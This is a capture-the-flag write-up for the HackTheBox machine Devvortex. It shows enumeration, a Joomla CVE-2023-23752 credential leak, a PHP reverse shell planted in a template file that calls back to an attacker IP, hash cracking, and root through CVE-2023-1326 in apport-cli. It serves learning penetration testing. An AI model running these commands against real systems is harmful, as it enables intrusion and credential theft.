> For the complete documentation index, see [llms.txt](https://p0db0t.gitbook.io/pentest/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://p0db0t.gitbook.io/pentest/group-1/hackthebox-writeups/htb-devvortex.md).

# HTB - Devvortex

<figure><img src="/files/kAi96GB0Yo2xZBHr9UhJ" alt=""><figcaption></figcaption></figure>

## Enumeration Phase:

### Nmap scan

First off, I started my enumeration with an Nmap scan of **`10.10.11.242`**. The options I regularly use are: **-`sC`** is the equivalent to **`--script=default`** and runs a collection of Nmap enumeration scripts against the target, **`-sV`** does a service scan.

```
nmap -sC -sV 10.10.11.242
```

<figure><img src="/files/AdropfggfW0Hy5vBS4Sm" alt=""><figcaption></figcaption></figure>

I added **`devvortex.htb`** to `/etc/hosts` next to the IP of the box which is **`10.10.11.242`**

Since I still didn't have a way in, the next place to enumerate was **HTTP** on port **80**.  Navigating to **`http://devvortex.htb`**&#x20;

<figure><img src="/files/f5lvzYUSceqUPZrGfv3w" alt=""><figcaption></figcaption></figure>

### Brute-force hidden directories: <a href="#ee16" id="ee16"></a>

After visiting **`http://devvortex.htb`** I decided to brute-force hidden directories with Gobuster and didn't find anything :cry:

```
gobuster dir -u devvortex.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt -fs 200
```

### Subdomain enumeration: <a href="#ee16" id="ee16"></a>

I used also gobuster for this host Subdomain enumeration and found **dev.devvortex.htb**

```
gobuster vhost -u devvortex.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
```

<figure><img src="/files/oJ385MBrYQrTuMQpWwUO" alt=""><figcaption></figcaption></figure>

I added **`dev.devvortex.htb`** to `/etc/hosts` next to the IP of the box which is **`10.10.11.242`**

After visiting **`http://dev.devvortex.htb`**&#x20;

<figure><img src="/files/8r5INcQiReUHMrT41QSk" alt=""><figcaption></figcaption></figure>

### Brute-force hidden directories: <a href="#ee16" id="ee16"></a>

I decided to brute-force hidden directories with Dirsearch and find **/administrator/** and **/Readme.txt** :tada:

```
dirsearch -u dev.devvortex.htb
```

<figure><img src="/files/BBj6yGiMilgjaIDjhuFv" alt=""><figcaption></figcaption></figure>

On the **Administrator** page, I found out that is the login page of Joomla CMS.

<figure><img src="/files/wdINwbuit4kDwPo5IjkM" alt=""><figcaption></figcaption></figure>

On the **Readme.txt** page, I found out the version of **Joomla CMS 4.2**.

<figure><img src="/files/WItvdrXi6F340zWfEXhG" alt=""><figcaption></figcaption></figure>

### Initial Foothold: <a href="#id-5880" id="id-5880"></a>

I found out that **Joomla CMS 4.2** is Vulnerable to **CVE-2023-23752** and used the tool **Curl** to get some sensitive information including the **Username** and **Password** of user **Lewis**.\
About **CVE-2023-23752** more on this link:<https://nvd.nist.gov/vuln/detail/CVE-2023-23752>

```
curl -v 'http://dev.devvortex.htb/api/index.php/v1/config/application?public=true'
```

<figure><img src="/files/AyPx7FVFqHy7KoEsvmWy" alt=""><figcaption></figcaption></figure>

After login on to the **Administrator** page with credentials that I found with Curl, I edited **error.php** which was located at **/template/Cassiopeia/error.php** and set up reverse shell script.

```
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.175/9001 0>&1'");
?>
```

<figure><img src="/files/mbHRcAtWQIFTvEpj7fC4" alt=""><figcaption></figcaption></figure>

I ran **Netcat** to listen to incoming connections and used **Curl** to trigger a **reverse shell** at the **error.php** page.<br>

```
nc -lvnp 9001
curl http://dev.devvortex.htb/templates/cassiopeia/error.php
```

<figure><img src="/files/egBNYXeYZfYe1kmF1tpB" alt=""><figcaption></figcaption></figure>

**Boom!** I got the **shell** as **www-data**

<figure><img src="/files/muM8GmHAmxPvCKR2sxoB" alt=""><figcaption></figcaption></figure>

### Owning User: <a href="#id-7154" id="id-7154"></a>

**Credentials** that I found with **Curl** have also a **Database name** so I went for MySQL checking.

```
mysql -u lewis -p
show databases;
use joomla
show tables;
```

<figure><img src="/files/jf7ZHQN3cLQDyosPe7tF" alt=""><figcaption></figcaption></figure>

```
select * from sd4fg_users;
```

<figure><img src="/files/Rd9bbzDl5wUrEZYF7N1t" alt=""><figcaption></figcaption></figure>

Bingo :tada: I found the **hash** of **Lewis and** saved the hash locally in a .txt file.

```
echo 'HASH' >> hash.txt
```

I cracked the hash of **Logan** using the tool **John The Ripper**

```
sudo john --wordlist=/usr/share/wordlists/rockyou.txt --rules hash.txt
```

<figure><img src="/files/sd7TwhZZfhlOVsJuF7BP" alt=""><figcaption></figcaption></figure>

Sweet !!!! I log in as a user L**ogan** via **SSH**.

```
ssh logan@devvortex.htb
```

<figure><img src="/files/NFL4LYPjtrrmlGCJkthR" alt=""><figcaption></figcaption></figure>

### Owning Root: <a href="#a6ef" id="a6ef"></a>

The **sudo -l** command gives me some interesting output

```
sudo -l
```

<figure><img src="/files/t8dBGrPLrPPjFLzVMrTv" alt=""><figcaption></figcaption></figure>

I found out that **Apport-cli** is Vulnerable to **CVE-2023-1326**\
About **CVE-2023-1326** more on this link: [**https://bugs.launchpad.net/ubuntu/+source/apport/+bug/2016023**](https://bugs.launchpad.net/ubuntu/+source/apport/+bug/2016023)

```
sudo apport-cli -c /bin/mysql less
v
!
id
```

<figure><img src="/files/ZgWVZwl74DfnyRdsbaU2" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://p0db0t.gitbook.io/pentest/group-1/hackthebox-writeups/htb-devvortex.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
